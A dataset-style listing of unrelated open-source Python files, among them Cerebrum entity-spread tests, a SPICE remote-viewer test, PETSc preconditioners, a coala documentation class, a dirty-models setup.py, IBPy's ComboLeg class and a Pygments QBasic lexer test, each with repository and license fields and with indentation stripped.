assert len(all_spreads) >= len((entity_spread, entity_spread_alt))
for col in columns:
assert col in dict(all_spreads[0])
# 'entity_spread' and 'entity_spread_alt' should be the only spreads that
# apply to 'entity_type'
entity_spreads = entity.list_spreads(entity_types=entity_type)
assert len(entity_spreads) == len((entity_spread, entity_spread_alt))
assert entity_spread.description in [r['description'] for r in
entity_spreads]
assert str(entity_spread_alt) in [r['spread'] for r in entity_spreads]
def test_list_all_with_spread(entity_obj, entities):
spreads = {spread for ent in entities for spread in ent['spreads']}
result = entity_obj.list_all_with_spread(spreads=spreads)
result_ids = {r['entity_id'] for r in result}
for entry in entities:
if entry['spreads']:
assert entry['entity_id'] in result_ids
else:
assert entry['entity_id'] not in result_ids
def test_list_entity_spreads(entity_obj, entities, entity_type):
expected = [(long(ent['entity_id']), long(int(spread)))
for ent in entities
for spread in ent['spreads']]
entity_types = {ent['entity_type'] for ent in entities}
all_results = entity_obj.list_entity_spreads()
assert len(all_results) >= len(expected)
results = entity_obj.list_entity_spreads(entity_types=entity_types)
assert list(tuple(r) for r in results) == expected
|
unioslo/cerebrum
|
testsuite/tests/test_core/test_core_Entity/test_EntitySpread.py
|
Python
|
gpl-2.0
| 4,894
|
#!/usr/bin/env python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
"""Connect with remote-viewer from client VM to guest VM.
"""
import logging
from avocado.core import exceptions
from spice.lib import stest
from spice.lib import utils
from spice.lib import act
logger = logging.getLogger(__name__)
def run(vt_test, test_params, env):
"""Run remote-viewer at client VM.
Parameters
----------
vt_test : avocado.core.plugins.vt.VirtTest
QEMU test object.
test_params : virttest.utils_params.Params
Dictionary with the test parameters.
env : virttest.utils_env.Env
Dictionary with test environment.
"""
test = stest.ClientGuestTest(vt_test, test_params, env)
cfg = test.cfg
act.x_active(test.vmi_c)
act.x_active(test.vmi_g)
with act.new_ssn_context(test.vmi_c, dogtail_ssn=test.vmi_c.vm.is_rhel8(),
name="Remote Viewer") as ssn:
act.rv_connect(test.vmi_c, ssn)
try:
act.rv_chk_con(test.vmi_c)
except utils.SpiceUtilsError as e:
logger.info("Test failed as expected. Reason: %s", e)
else:
raise exceptions.TestFail(
"RV connection was established when it was supposed to fail.")
|
spiceqa/tp-spice
|
spice/tests/rv_connect_fail.py
|
Python
|
gpl-2.0
| 1,694
|
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
from PackageName.PETScFunc import PETScMatOps
def PCD(A, b):
u = PETScMatOps.PETScMultiDuplications(b,3)
A['kspL'].solve(b,u[0])
A['Fp'].mult(u[0],u[1])
A['kspM'].solve(u[1],u[2])
return u[2]
def LSC(A, b):
u = b.duplicate()
A['kspL'].solve(b,u)
y = A['scaledBt'].getVecLeft()
A['scaledBt'].mult(u,y)
x = A['F'].getVecLeft()
A['F'].mult(y,x)
u.set(0)
A['scaledBt'].multTranspose(x,u)
y.destroy()
y = u.duplicate()
A['kspL'].solve(u,y)
return y
|
wathen/PhD
|
MHD/FEniCS/MyPackage/PackageName/Preconditioners/NSapprox.py
|
Python
|
mit
| 605
|
import sys
def setup():
return
def run(core, actor, target, commandString):
if actor and target:
core.groupService.handleGroupKick(actor, target)
return
|
agry/NGECore2
|
scripts/commands/dismissgroupmember.py
|
Python
|
lgpl-3.0
| 162
|
from inspect import cleandoc
from coala_utils.decorators import (
enforce_signature, generate_consistency_check)
@generate_consistency_check('definition', 'example', 'example_language',
'importance_reason', 'fix_suggestions')
class Documentation:
"""
This class contains documentation about an aspectclass.
The documentation is consistent if all members are given:
>>> Documentation('defined').check_consistency()
False
>>> Documentation('definition', 'example',
... 'example_language', 'importance',
... 'fix').check_consistency()
True
"""
@enforce_signature
def __init__(self, definition: str='', example: str='',
example_language: str='', importance_reason: str='',
fix_suggestions: str=''):
"""
Contains documentation for an aspectclass.
:param definition: What is this about?
:param example: An example in a well known language.
:param example_language: The language used for the example.
:param importance_reason: A reason why this aspect is important.
:param fix_suggestions: Suggestions on how this can be fixed.
"""
self.definition = cleandoc(definition)
self.example = cleandoc(example)
self.example_language = cleandoc(example_language)
self.importance_reason = cleandoc(importance_reason)
self.fix_suggestions = cleandoc(fix_suggestions)
|
refeed/coala
|
coalib/bearlib/aspects/docs.py
|
Python
|
agpl-3.0
| 1,522
|
import ast
import sys
import os
import re
from setuptools import setup
path = os.path.join(os.path.dirname(__file__), 'dirty_models', '__init__.py')
with open(path, 'r') as file:
t = compile(file.read(), path, 'exec', ast.PyCF_ONLY_AST)
for node in (n for n in t.body if isinstance(n, ast.Assign)):
if len(node.targets) != 1:
continue
name = node.targets[0]
if not isinstance(name, ast.Name) or \
name.id not in ('__version__', '__version_info__', 'VERSION'):
continue
v = node.value
if isinstance(v, ast.Str):
version = v.s
break
if isinstance(v, ast.Tuple):
r = []
for e in v.elts:
if isinstance(e, ast.Str):
r.append(e.s)
elif isinstance(e, ast.Num):
r.append(str(e.n))
version = '.'.join(r)
break
install_requires = ['python-dateutil']
if sys.version_info < (3, 4):
install_requires.append('enum34')
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as desc_file:
long_desc = desc_file.read()
invalid_roles = ['meth', 'class', 'attr']
long_desc = re.sub(r':(?:{}):`([^`]+)`'.format('|'.join(invalid_roles)), r'`\1`', long_desc)
setup(
name='dirty-models',
url='https://github.com/alfred82santa/dirty-models',
author='alfred82santa',
version=version,
author_email='alfred82santa@gmail.com',
license='BSD',
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: BSD License',
'Development Status :: 4 - Beta'],
packages=['dirty_models'],
include_package_data=False,
install_requires=install_requires,
description="Dirty models for python 3",
long_description=long_desc,
test_suite="nose.collector",
tests_require="nose",
zip_safe=True,
)
|
alfred82santa/dirty-models
|
setup.py
|
Python
|
bsd-2-clause
| 2,158
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##
# Translated source for ComboLeg.
##
# Source file: ComboLeg.java
# Target file: ComboLeg.py
#
# Original file copyright original author(s).
# This file copyright Troy Melhase, troy@gci.net.
#
# WARNING: all changes to this file will be lost.
from ib.lib.overloading import overloaded
from ib.ext.Util import Util
class ComboLeg(object):
""" generated source for ComboLeg
"""
SAME = 0
OPEN = 1
CLOSE = 2
UNKNOWN = 3
m_conId = 0
m_ratio = 0
m_action = ""
m_exchange = ""
m_openClose = 0
m_shortSaleSlot = 0
m_designatedLocation = ""
@overloaded
def __init__(self):
pass # super(ComboLeg, self).__init__(0, 0, None, None, 0, 0, None)
@__init__.register(object, int, int, str, str, int)
def __init___0(self, p_conId,
p_ratio,
p_action,
p_exchange,
p_openClose):
pass # super(ComboLeg, self).__init__(p_conId, p_ratio, p_action, p_exchange, p_openClose, 0, None)
@__init__.register(object, int, int, str, str, int, int, str)
def __init___1(self, p_conId,
p_ratio,
p_action,
p_exchange,
p_openClose,
p_shortSaleSlot,
p_designatedLocation):
self.m_conId = p_conId
self.m_ratio = p_ratio
self.m_action = p_action
self.m_exchange = p_exchange
self.m_openClose = p_openClose
self.m_shortSaleSlot = p_shortSaleSlot
self.m_designatedLocation = p_designatedLocation
def __eq__(self, p_other):
if self is p_other:
return True
else:
if p_other is None:
return False
l_theOther = p_other
if (self.m_conId != l_theOther.m_conId) or (self.m_ratio != l_theOther.m_ratio) or (self.m_openClose != l_theOther.m_openClose) or (self.m_shortSaleSlot != l_theOther.m_shortSaleSlot):
return False
if (Util.StringCompareIgnCase(self.m_action, l_theOther.m_action) != 0) or (Util.StringCompareIgnCase(self.m_exchange, l_theOther.m_exchange) != 0) or (Util.StringCompareIgnCase(self.m_designatedLocation, l_theOther.m_designatedLocation) != 0):
return False
return True
|
kkanahin/ibpy
|
ib/ext/ComboLeg.py
|
Python
|
bsd-3-clause
| 2,415
|
import os
from config import config
from incremental_upload_handler import IncrementalUploadHandler
from Utils.util import FileUtil
from file_entity import FileEntity
def gen_test_data():
server_file = os.path.join(config.server_folder,'test.txt')
client_file = os.path.join(config.client_folder,'test.txt')
data = ''
len = 24
for i in range(0,len):
data += 'A'
FileUtil.write_file_data(server_file,data)
data = ''
for i in range(0,len):
if i == 14:
data += 'B'
else:
data += 'A'
FileUtil.write_file_data(client_file,data)
if __name__ == "__main__":
gen_test_data()
server_file_path = os.path.join(config.server_folder,'test.txt')
client_file_path = os.path.join(config.client_folder,'test.txt')
server_file = FileEntity(server_file_path)
client_file = FileEntity(client_file_path)
server_handler = IncrementalUploadHandler(server_file)
server_handler.TEST_gen_server_blocks_map()
adler32_pair = server_handler.compute_check_sum()
#for i in range(0,len(adler32_pair) % 10):
# print adler32_pair[i]
client_handler = IncrementalUploadHandler(client_file,adler32_pair)
server_handler.server_adler32_pair = adler32_pair
diffs = client_handler.diff()
log = ''
for i in range(0,len(diffs)):
log += str(diffs[i])
FileUtil.write_file_data(r'D:\test\log.log',log)
new_server_file_info = server_handler.gen_data_block(diffs)
#for i in range(0,len(new_server_file_info)):
# print new_server_file_info[i]
|
JasonJDong/CompressBinary
|
IncrementalUpdate/IncrementalUpdate/main.py
|
Python
|
gpl-2.0
| 1,595
|
# -*- coding: utf-8 -*-
"""
Tests for QBasic
~~~~~~~~~~~~~~~~
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import glob
import os
import unittest
from pygments.token import Token
from pygments.lexers.qbasic import QBasicLexer
class QBasicTest(unittest.TestCase):
def setUp(self):
self.lexer = QBasicLexer()
self.maxDiff = None
def testKeywordsWithDollar(self):
fragment = u'DIM x\nx = RIGHT$("abc", 1)\n'
expected = [
(Token.Keyword.Declaration, u'DIM'),
(Token.Text.Whitespace, u' '),
(Token.Name.Variable.Global, u'x'),
(Token.Text, u'\n'),
(Token.Name.Variable.Global, u'x'),
(Token.Text.Whitespace, u' '),
(Token.Operator, u'='),
(Token.Text.Whitespace, u' '),
(Token.Keyword.Reserved, u'RIGHT$'),
(Token.Punctuation, u'('),
(Token.Literal.String.Double, u'"abc"'),
(Token.Punctuation, u','),
(Token.Text.Whitespace, u' '),
(Token.Literal.Number.Integer.Long, u'1'),
(Token.Punctuation, u')'),
(Token.Text, u'\n'),
]
self.assertEqual(expected, list(self.lexer.get_tokens(fragment)))
|
markeldigital/design-system
|
vendor/ruby/2.0.0/gems/pygments.rb-0.6.3/vendor/pygments-main/tests/test_qbasiclexer.py
|
Python
|
mit
| 1,322
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.